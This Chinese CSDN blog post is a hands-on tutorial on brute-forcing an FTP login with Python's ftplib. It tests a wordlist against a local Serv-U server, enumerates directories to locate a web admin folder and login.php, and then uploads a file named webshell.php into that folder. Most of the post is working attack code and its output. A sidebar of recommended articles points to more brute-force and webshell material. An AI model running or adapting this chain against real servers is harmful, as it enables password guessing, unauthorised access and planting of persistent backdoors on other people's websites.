Python遍历破解FTP密码,并上传webshell

最新推荐文章于 2022-06-25 14:29:16 发布
最新推荐文章于 2022-06-25 14:29:16 发布
阅读量737 收藏 1
点赞数
分类专栏: Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41896770/article/details/105383384
版权

使用来自ftplib包的FTP模块,就可以轻松暴力输入FTP密码,进行破解,下面为了方便演示,使用用户名为admin来测试
网上一时没有找到可以使用的FTP站点,所以自己搭建一个FTP服务器测试下,官网:下载Serv-U
 

from ftplib import FTP

ftpaddr='127.0.0.1'
uname='admin'

def getPwd(upwd):
    try:
        ftp=FTP(ftpaddr)
        ftp.login(uname,upwd)
        print('正确密码为:{0}'.format(upwd))
        return True
    except Exception:
        return False

pwdlist=open('pwds.txt','r')
pwds=pwdlist.readlines()    
for pwd in pwds:
    print("密码输入为:{0}".format(pwd))
    pwd=pwd.strip()
    if(getPwd(pwd)):
        break
pwdlist.close()

密码输入为:admin

密码输入为:admin123

正确密码为:admin123

 最开始的时候使用的FTP地址为ftp://127.0.0.1,总是报错,后来发现不需要加,直接就是地址即可,127.0.0.1即可,不然将出现下面这样的异常错误:

Traceback (most recent call last):
  File "C:\Python27\1.py", line 27, in <module>
    ftp=FTP(ftpaddr)
  File "C:\Python27\lib\ftplib.py", line 120, in __init__
    self.connect(host)
  File "C:\Python27\lib\ftplib.py", line 135, in connect
    self.sock = socket.create_connection((self.host, self.port),
self.timeout)
  File "C:\Python27\lib\socket.py", line 557, in create_connection
    for res in getaddrinfo(host, port, 0, SOCK_STREAM):
gaierror: [Errno 11001] getaddrinfo failed

ftp目录和文件的一些操作

# encoding:utf-8

from ftplib import FTP

ftp=FTP('127.0.0.1','admin','admin123')
#print(ftp.getwelcome())    #220 Serv-U FTP Server v15.1 ready...
#ftp.retrlines('LIST')      #列出目录和文件的详细信息

def getSubDir(self, *args):
        cmd = 'LIST'
        func = None
        if args[-1:] and type(args[-1]) != type(''):
            args, func = args[:-1], args[-1]
        for arg in args:
            cmd = cmd + (' ' + arg)
        files = []
        ftp.retrlines(cmd, files.append)
        return files
#获取目录列表
def getDirs(dirname=None):
        if dirname != None:
            ftp.cwd(dirname)
        files = getSubDir('')

        #详细信息都去掉,只截取目录和文件的名称
        fname = [f.split(" ")[-1] for f in files]
        #去掉.和..以及文件,这样就只剩下目录了
        return [f for f in fname if '.' not in f]

#获取文件列表
def getFiles(dirname=None):
        if dirname != None:
            ftp.cwd(dirname)
        return ftp.nlst()

#找到webadmin目录的位置(这里测试两层目录)
def findDir(dir1,dir2):
    if(dir1.lower().find('webadmin')>=0):
        print('位置为:{0}'.format(dir1))
    if(dir2.lower().find('webadmin')>=0):
        print('位置为:{0}'.format(dir1 + '/' + dir2))

dirList1=getDirs('')
for d1 in dirList1:
    print(d1)
    findDir(d1,'')

    ftp.cwd('..')
    dirList2=getDirs(d1)
    for d2 in dirList2:
        print('  '+d2)
        findDir(d1,d2)

#找到login.php所在的位置
def findFile(dirname,fname):
    if(fname.lower().find('login.php')>=0):
        print('文件所在目录为:{}'.format(dirname))

dirlist1=getDirs('')
for d1 in dirlist1:
    print(d1)
    ftp.cwd('~')    #跳转到根目录
    for f1 in getFiles(d1):
        f1=f1.decode('utf-8')
        findFile(d1,f1)

    ftp.cwd('..')   #跳转到上级目录
    dirlist2=getDirs(d1)
    for d2 in dirlist2:
        print('  '+d2)
        ftp.cwd('~')    #跳转到根目录
        for f2 in getFiles(d1+'/'+d2):
            f2=f2.decode('utf-8')
            findFile(d1+'/'+d2,f2)

BBBBB
  nnnnnnnn
ccccc
hjjhjh
Serv-U
  12345
  Crack
  新建文件夹
wwww
  webadmin
位置为:wwww/webadmin

 BBBBB
  nnnnnnnn
ccccc
hjjhjh
Serv-U
  12345
  Crack
  新建文件夹
wwww
  webadmin
文件所在目录为:wwww/webadmin

上传webshell

ftp=FTP('127.0.0.1','admin','admin123')
fp=open('D:/Serv-U/wwww/webadmin/1.txt','rb')
ftp.cwd("wwww/webadmin")
ftp.storbinary("STOR webshell.php",fp)
print('成功将1.txt文件内容写入到webshell.php文件里')
fp.close()
ftp.quit()

 

寅恪光潜
关注
专栏目录
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3217
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
ftp暴力破解 python脚本
12-24
ftp暴力破解 python脚本
利用python打造自己的ftp暴力破解工具
weixin_34405332的博客
12-14 81
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要,根据自身的情况编写需要的程序,让程序代替我们去做一些枯燥的重复工作。下面直接上代码,下面是主文件main.pyimport osimport timeimport...
Python编程--使用Ftplib暴力破解FTP用户口令
Liu_Bruce的博客
06-25 1366
暴力破解FTP用户名/密码,假设用户名/密码对是存储在一个纯文本文件中。如下所示: 创建一个名为bruteLogin()的函数,这个函数接收的参数是主机名和含有密码的文件,返回一个能登录该主机的用户名/密码。该函数逐行读取文件中的每一行记录,用户名和密码之间是以冒号分隔的。然后函数尝试用这个用户名和密码登录FTP服务器。如果成功,则返回一个用户名和密码的tuple。如果失败,跳过该异常继续到下一行。如果函数穷尽所有行仍未成功登录,则返回一个值为None 、None的tuple。示例代码如下: 通过遍历用户名
Python实现FTP暴力破解
liuyukuan的专栏
12-09 1751
#!/usr/bin/env python #-*-coding:utf-8-*- #用Python实现FTP暴力破解 #网络编程 #套接字socket #BSD UNIX的进程通信机制 import socket,sys def Connect(username,password): s=socket.socket(socket.AF_INET,socket.SOCK_
ftp密码破解脚本
Bu2n的博客
12-20 1060
代码运行结果测试环境遇到的问题 代码 import ftplib import sys import argparse """ 测试环境python3.10 """ # 建立ftp连接 def ftp_connect(host,user,password): try: print(f'[+] 尝试登录 {password}') ftp = ftplib.FTP(host,user,password,encoding='gbk') except ftpl.
暴力破解方式
weixin_60757883的博客
04-07 2653
暴力破解漏洞介绍 暴力破解的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段暴力破解的产生是由于破解所需信息,如用户名、密码、验证码等。暴力破解需要一个庞大的字典,如 4 位数字的验证码,那么暴力破解的范围就是 0000~9999,暴力破解的关键在于字典的大小 二.暴力破解靶场实战 漏洞描述: 由于没有对登录页面进行相关的人机验证机制,如无验证码、有验证码但可重复利用以及无登录错误次数登录账号和密码。限制等,导致攻击者可通过暴力破解获取用户 修复建议 1、如果用户登录次数超过
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传上传不能正常导入的文件 你常用的渗
渗透测试学习目录
liupc的学习笔记
05-04 3356
1. 行业术语扫盲 2. 3.
webshell FTP快速提权服务器 教材
12-16
webshell FTP快速提权服务器 教程详细 webshell 完整操作 教材很详细 希望对大家有帮助
python---ftplib,ftp使用,ftp破解用户与密码ftp服务器查找web页面
xwbk12的博客
01-26 2471
pythonftplib,ftp使用 一、环境配置 1、在windows服务器192.168.40.239上开启ftp的匿名连接 2、在客户端192.168.40.128使用匿名进行连接ftp服务器 二、使用Python代码连接ftp服务器 1、使用基本匿名连接 root@kali:~/python/ftp# ls ftp_anonymous_input.py ftp_
webshell相关之——渗透获取webshell思路总结
温柔小薛的博客
04-30 4049
渗透获取webshell思路总结 又坐一天没动地方哈,但是感觉还是有一些没真整明白,也没总结的特别全面细致,今天先发出来,明天再花时间再整理一下,这个问题也是很多面试中常见问题,我认为值得花些时间来研究。 今天就从CMS和非CMS,与有管理权限和无管理权限(无需登录),这几个方面来梳理一下渗透测试获取webshell的思路,并没有很具体的方法实战,现在关于这个思路都是用一个南方内个靶机,网上很多...
web渗透--FTP安全
朝阳似锦 晖映山河
08-26 376
一、FTP协议介绍 1、文件传输协议(File Transfer Protocol,缩写:FTP),是网络上进行文件传输的一套标准协议,使用客户/服务器模式(C/S)模式。它属于网络传输协议的应用层。FTP使用21号端口。 2、FTP将用户分为3类:Real用户、Administrator(管理者)、匿名用户。 3、FTP文件传输格式分为了两类:ASCLL、二进制格式。 二、FTP匿名登录漏洞 1、FTP默认是没有禁止匿名用户,所以可以进行Anonymous(匿名)...
网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限
weixin_32175667的博客
08-04 998
当我们想入侵检测一个网站拿后台/webshell后想进一步获得网站的服务器管理权限。小残在这里为大家介绍下一下思路第一个思路:啊D+GOOGLE找注入点PS:可以通过直接在网站查看动态界面 类似于:asp?id=的动态界面进行手工查找如果没找到动态页面可以通过百度或者谷歌进行搜索网站的动态页面通过谷歌语法: 假如要查看的网站是www.*****.net 那么就可以这样搜索 site:www.***...
靶机练习 No.20 Vulnhub靶机 jangow 01 ftp登录 命令执行写入webshell php反弹shell 45010.c内核漏洞提权
YouthBelief的博客
01-20 3110
0x00 环境准备 下载链接 https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 靶机介绍 难度:简单 上架时间:2021年11月4日 提示信息:The secret to this box is enumeration! Inquiries jangow2021@gmail.com 靶机配置 virtual box 启动,与kali配置同一网卡。 0x01 信息收集 靶机ip探测 端口服务识别 21/tcp ope
python批量上传 服务器_python批量操作Linux服务器脚本,key登录(执行命令、上传、下载)(二)...
weixin_39935654的博客
12-10 182
1#-*-coding:utf--*-2#批量操作linux服务器(执行命令,上传,下载)3#!/usr/bin/python4importparamiko5importdatetime6importos7importthreading8defssh2(ip,username,privatekeyfile,keypwd,cmd):9try:10...
几个ftp shell的例子汇总
jayli426的专栏
09-29 2083
[jyfx@aydmk1 app]$ cat get.shftp -n -i -v open 10.87.25.118user topeng i1love_mm binlcd /home/jyfx/dm_etl/app/bincd /home/topeng/topetl/app/binmget *.jarquitEOF   #!/bin/ksh #检查是否能连接到24.3pin
靶场练习第十八天~vulnhub靶场之hackableII
qq_57976347的博客
02-17 678
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 正在上传…重新上传取消 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sC -A -p- 192.168.101.124 2.网站信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什
Python Twisted框架实现Webshell密码扫描器教程
本文主要介绍了如何使用Python的Twisted框架构建一个webshell密码扫描器,通过对比同步和异步通信的优缺点,强调了在Windows系统中,异步通信技术如IOCP(I/O完成端口)对于提高效率的重要性。教程中提到了几个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

寅恪光潜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值